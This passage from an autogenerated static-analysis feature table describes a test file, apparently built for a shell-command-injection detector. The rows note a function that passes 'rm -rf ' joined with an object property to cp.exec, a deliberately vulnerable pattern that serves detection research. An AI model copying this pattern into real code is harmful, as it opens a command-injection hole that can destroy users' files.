last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:17 | obj.version = "" | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:17 | obj.version = "" | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:17 | obj.version = "" | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:2:270:17 | obj.version = "" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:6:270:12 | version | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:6:270:12 | version | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:6:270:12 | version | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:6:270:12 | version | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:6:270:12 | version | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:16:270:17 | "" | assignedToPropName | version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:16:270:17 | "" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:16:270:17 | "" | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:16:270:17 | "" | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:16:270:17 | "" | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:270:16:270:17 | "" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:3 | cp | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:3 | cp | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:3 | cp | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:8 | cp.exec | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:8 | cp.exec | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:8 | cp.exec | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | cp.exec ... ersion) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | cp.exec ... ersion) | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | cp.exec ... ersion) | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | cp.exec ... ersion) | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | cp.exec ... ersion) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | exceptional return of cp.exec ... ersion) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | exceptional return of cp.exec ... ersion) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | exceptional return of cp.exec ... ersion) | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | exceptional return of cp.exec ... ersion) | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:2:272:33 | exceptional return of cp.exec ... ersion) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:5:272:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:5:272:8 | exec | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:5:272:8 | exec | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:5:272:8 | exec | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:5:272:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:18 | "rm -rf " | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:18 | "rm -rf " | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:18 | "rm -rf " | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:18 | "rm -rf " | stringConcatenatedWith | -endpoint- obj.version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:32 | "rm -rf ... version | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:32 | "rm -rf ... version | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:32 | "rm -rf ... version | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:32 | "rm -rf ... version | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:32 | "rm -rf ... version | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:32 | "rm -rf ... version | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:32 | "rm -rf ... version | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:32 | "rm -rf ... version | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:10:272:32 | "rm -rf ... version | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:24 | obj | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:24 | obj | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:24 | obj | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:24 | obj | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:24 | obj | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:32 | obj.version | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:32 | obj.version | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:32 | obj.version | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:32 | obj.version | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:32 | obj.version | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:22:272:32 | obj.version | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:26:272:32 | version | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:26:272:32 | version | contextSurroundingFunctionParameters | (obj) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:26:272:32 | version | enclosingFunctionBody | obj cp exec rm -rf obj version obj version cp exec rm -rf obj version | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:26:272:32 | version | enclosingFunctionName | sanitizerProperty | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:272:26:272:32 | version | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:275:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:275:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:275:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:275:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:275:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:275:1:275:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 